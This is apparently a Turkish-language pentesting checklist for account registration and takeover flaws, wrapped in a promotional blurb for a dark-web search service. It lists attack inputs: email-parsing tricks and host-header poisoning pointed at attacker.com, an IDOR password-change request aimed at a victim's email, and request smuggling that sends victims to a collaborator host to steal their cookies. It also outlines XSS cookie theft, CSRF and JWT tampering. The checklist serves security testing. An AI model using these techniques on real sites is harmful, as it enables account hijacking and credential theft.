Registration & Takeover Vulnerabilities
WhiteIntel, karanlık ağ destekli bir arama motorudur ve şirketin veya müşterilerinin hırsız kötü amaçlı yazılımlar tarafından kompromize edilip edilmediğini kontrol etmek için ücretsiz işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını ücretsiz deneyebilirsiniz:
Kayıt Ele Geçirme
Çoğaltılmış Kayıt
Var olan bir kullanıcı adı kullanarak oluşturmayı deneyin
E-postayı değiştirerek kontrol edin:
büyük harf
+1@
e-postada nokta ekleyin
e-posta adında özel karakterler (%00, %09, %20)
E-postadan sonra siyah karakterler ekleyin:
test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Kullanıcı Adı Sıralaması
Bir kullanıcı adının uygulama içinde zaten kaydedilip kaydedilmediğini anlamaya çalışın.
Şifre Politikası
Kullanıcı oluştururken şifre politikasını kontrol edin (zayıf şifreler kullanılıp kullanılamayacağını kontrol edin). Bu durumda kimlik bilgilerini brute force deneyebilirsiniz.
SQL Enjeksiyonu
Bu sayfayı kontrol edin hesap ele geçirmeleri yapmaya veya kayıt formlarından bilgi çekmeye yönelik SQL Enjeksiyonları denemek için.
Oauth Ele Geçirmeleri
pageOAuth to Account takeoverSAML Güvenlik Açıklıkları
pageSAML AttacksE-posta Değiştirme
Kayıt olduktan sonra e-postayı değiştirmeyi deneyin ve bu değişikliğin doğru bir şekilde doğrulandığını veya rastgele e-postalara değiştirilebileceğini kontrol edin.
Daha Fazla Kontrol
Tek kullanımlık e-postaları kullanıp kullanamayacağınızı kontrol edin
Uzun şifre (>200) DoS'a neden olur
Hesap oluşturmadaki hız sınırlarını kontrol edin
username@burp_collab.net kullanın ve geri çağrıyı analiz edin
Şifre Sıfırlama Ele Geçirme
Referans Aracılığıyla Şifre Sıfırlama Jetonu Sızıntısı
E-posta adresinize şifre sıfırlama isteği gönderin
Şifre sıfırlama bağlantısına tıklayın
Şifreyi değiştirmeyin
Herhangi bir 3. taraf web sitesine (örneğin: Facebook, twitter) tıklayın
Burp Suite proxy'de isteği onaylayın
Referer başlığının şifre sıfırlama jetonunu sızdırıp sızdırmadığını kontrol edin.
Şifre Sıfırlama Zehirlenmesi
Burp Suite'de şifre sıfırlama isteğini onaylayın
Burp Suite'de aşağıdaki başlıkları ekleyin veya düzenleyin:
Host: attacker.com
,X-Forwarded-Host: attacker.com
Değiştirilmiş başlıkla isteği yönlendirin
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
host başlığına dayalı bir şifre sıfırlama URL'si arayın:
https://attacker.com/reset-password.php?token=TOKEN
E-posta Parametresi Aracılığıyla Şifre Sıfırlama
API Parametrelerinde IDOR
Saldırgan kendi hesabıyla giriş yapmalı ve Şifre Değiştir özelliğine gitmelidir.
Burp Suite'u başlatın ve isteği Intercept edin.
İsteği tekrarlayıcı sekmesine gönderin ve parametreleri düzenleyin: Kullanıcı Kimliği/e-posta
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Zayıf Şifre Sıfırlama Jetonu
Şifre sıfırlama jetonu her seferinde rastgele oluşturulmalı ve benzersiz olmalıdır. Jetonun süresinin dolup dolmadığını veya her zaman aynı olup olmadığını belirlemeye çalışın, bazı durumlarda oluşturma algoritması zayıf olabilir ve tahmin edilebilir. Aşağıdaki değişkenler algoritma tarafından kullanılabilir.
Zaman Damgası
Kullanıcı Kimliği
Kullanıcının E-postası
Ad ve Soyad
Doğum Tarihi
Kriptografi
Yalnızca Sayılar
Küçük jeton dizisi (karakterler arasında [A-Z,a-z,0-9])
Jetonun yeniden kullanımı
Jetonun son kullanma tarihi
Sızan Şifre Sıfırlama Jetonu
Belirli bir e-posta için API/UI kullanarak şifre sıfırlama isteği tetikleyin, örneğin: test@mail.com
Sunucu yanıtını inceleyin ve
resetToken
için kontrol edinArdından jetonu aşağıdaki gibi bir URL'de kullanın:
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Kullanıcı Adı Çakışması Yoluyla Şifre Sıfırlama
Kurbanın kullanıcı adına, kullanıcı adının başına ve/veya sonuna boşluklar eklenmiş, ancak kurbanın kullanıcı adıyla aynı olan bir kullanıcı adıyla sistemde kaydolun, örneğin:
"admin "
Kötü niyetli kullanıcı adınızla bir şifre sıfırlama isteği isteyin.
E-postanıza gönderilen jetonu kullanın ve kurbanın şifresini sıfırlayın.
Yeni şifreyle kurban hesabına bağlanın.
Platform CTFd bu saldırıya karşı savunmasızdı. Bkz: CVE-2020-7245
XSS Aracılığıyla Hesap Ele Geçirme
Uygulama içinde veya çerezlerin üst alan etki alanına (
*.domain.com
) kapsandığı bir alt alanında XSS bulun.Mevcut oturum çerezini sızdırın
Çerez kullanarak kullanıcı olarak kimlik doğrulayın
HTTP İstek Kaçırma Aracılığıyla Hesap Ele Geçirme
1. Türde HTTP İstek Kaçırma (CL, TE, CL.TE) tespit etmek için smuggler'ı kullanın
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. POST / HTTP/1.1
'i aşağıdaki verilerle üzerine yazacak bir istek oluşturun:
GET http://something.burpcollaborator.net HTTP/1.1 X:
hedef, kurbanları burpcollab'a yönlendirmek ve çerezlerini çalmaktır
3. Son istek aşağıdaki gibi olabilir
Hackerone raporları bu hatayı sömürüyor\
CSRF Aracılığıyla Hesap Ele Geçirme
CSRF için bir yük oluştur, örn: "Şifre değişikliği için otomatik gönderimli HTML formu"
Yükü gönder
JWT Aracılığıyla Hesap Ele Geçirme
JSON Web Token, bir kullanıcıyı doğrulamak için kullanılabilir.
JWT'yi başka bir Kullanıcı Kimliği / E-posta ile düzenle
Zayıf JWT imzasını kontrol et
Referanslar
WhiteIntel, karanlık ağ destekli bir arama motorudur ve şirketin veya müşterilerinin hırsız kötü amaçlı yazılımlar tarafından kompromize edilip edilmediğini kontrol etmek için ücretsiz işlevsellikler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını ücretsiz deneyebilirsiniz:
Last updated